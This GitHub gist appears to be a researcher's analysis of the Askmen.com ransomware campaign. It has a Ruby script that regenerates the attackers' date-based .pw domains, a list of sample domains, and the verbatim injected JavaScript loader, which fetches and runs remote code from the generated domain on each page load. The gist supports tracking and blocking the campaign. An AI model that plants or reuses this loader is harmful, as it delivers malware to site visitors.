Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Generated Domains Used In Askmen.com Ransomware Distribution http://threatglass.com/malicious_urls/8936
require 'zlib'
require 'date'
def gen_crc(date: date)
str = [date.year, date.month, date.day].join("+=+")
Zlib::crc32(str)
end
start_dt = Date.parse('2014-06-01')
end_dt = start_dt + 30
date_domains = (start_dt..end_dt).map do |dt|
gen_str = gen_crc(date: dt).to_s(16)
[dt, gen_str + ".pw", "http://registry.pw/whois/?query=#{gen_str}&output=nice"]
end
puts date_domains.map{|dd| dd.join(",")}
2014-06-18 9b66653c.pw http://registry.pw/whois/?query=9b66653c&output=nice
2014-06-19 ec6155aa.pw http://registry.pw/whois/?query=ec6155aa&output=nice
2014-06-20 be90becd.pw http://registry.pw/whois/?query=be90becd&output=nice
2014-06-21 c9978e5b.pw http://registry.pw/whois/?query=c9978e5b&output=nice
2014-06-22 509edfe1.pw http://registry.pw/whois/?query=509edfe1&output=nice
2014-06-23 2799ef77.pw http://registry.pw/whois/?query=2799ef77&output=nice
var wqqqqwqwqwqqqqwqq='qqwqwqqwwqwwwqqwwqwwqw';function crcTableG(){var c;var crcTable = [];for(var n =0; n < 256; n++){c = n;for(var k =0; k < 8; k++){c = ((c&1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));}crcTable[n] = c;}return crcTable;};function crc32(str) {var crcTable = crcTableG();var crc = 0 ^ (-1);for (var i = 0; i < str.length; i++ ) {crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];}return (crc ^ (-1)) >>> 0;};var d = "+=+";var date = new Date();var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth()+1) + d + date.getUTCDate();window.rctm=function(p){var s = document.createElement('SCRIPT'); s.text = b64dec(p).replace(/\0+/,''); document.body.appendChild(s);};var s = document.createElement('SCRIPT');s.src="http://" + crc32(dateStr).toString(16) + ".pw/nbe.html?"+Math.random();document.body.appendChild(s);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.